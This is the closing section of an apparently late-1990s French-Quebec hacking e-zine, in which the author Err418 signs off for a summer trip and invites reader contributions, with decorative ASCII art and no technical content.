| R | R | Q | O | T | L | I | R | M | U |
+---+---+---+---+---+---+---+---+---+---+
| L | E | H | A | C | K | I | N | G | S |
+---+---+---+---+---+---+---+---+---+---+

-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                               0=------------=0
                               |  Conslusion  |
                               0=------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Yep, un autre numro de fini... moi je pars en vacance sur le pouce
avec Calimes... on va au Vans Warped Tour  Montreal pis faire un tour aux USA
pour finalement se ramasser au GT de #warezquebec.

        Je pars du 20 juillet au 1 aot alors ne paniquez pas si vos e-mail ne
sont pas replyer tout de suite.

        Je pars, j'oublie tout... mme mon ordi. (ouf ca va etre dur) :-)

Je vous reparlerai de la Saga Corruption Addicts si y'a des dveloppements.

Apportez de l'eau au moulin : err418@technologist.com


          000000000000000000000000
          000000000000000000000000
          00000000000000000000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000                              
                   0000000                  0000000000000000000
                   0000000                000000000000000000000
                   0000000               00000000000000000000
                   0000000              00000
                   0000000             00000
                   0000000            00000
                                      00000
                                      00000
                T                     00000
                 O                    00000
                  T                   00000
                   A                   00000
                    L                  000000
                                        000000
                     Control             000000
                                          00000000000000000000000
                         Industries        0000000000000000000000
                                             00000000000000000000


(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission=-=-=-=-=-=-=-=-=-=-=-=-=-)
